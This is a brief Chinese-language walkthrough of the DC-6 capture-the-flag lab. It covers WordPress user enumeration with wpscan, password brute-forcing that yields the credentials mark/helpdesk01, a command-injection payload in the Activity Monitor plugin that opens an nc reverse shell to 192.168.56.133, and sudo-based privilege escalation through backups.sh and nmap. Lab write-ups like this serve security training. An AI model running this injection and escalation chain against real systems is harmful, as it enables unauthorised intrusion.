扫描开启的服务:开启了22、80端口
目录遍历
查看80端口,发现是一个WordPress客框架
使用wpscan进行用户枚举
wpscan --url http://wordy --enumerate u 发现有五个用户
没有思路,在dc-6下载的官网有提示
根据提示生成密码字典
把五个用户写在一个文本,使用密码字典依次爆破
有一个mark用户 helpdesk01
在后台进行登录
这里有一个插件activity monitor;他有一个远程命令执行漏洞
Tools 这里有一个提交Lookup
抓包验证
命令输入执行nc监听
127.0.0.9 | nc -e /bin/bash 192.168.56.133 4444
查看home目录
Mark/stuff目录下面有一个文件
Graham是前面爆出来的用户;
22端口是开启的,可以尝试ssh连接
进行尝试提权
sudo -l 查看当前用户的执行权限
jens/下面的backups.sh是一个可执行shell文件
在里面写上一个/bin/bash并执行,实行水平越权;可以拿到一个shell
Sudo -u jens ./backups.sh
sudo -l 查看当前用户的执行权限
有一个nmap执行文件,是以root权限执行的
写一个nmap脚本,在执行脚本文件的时候,实现水平越权
成功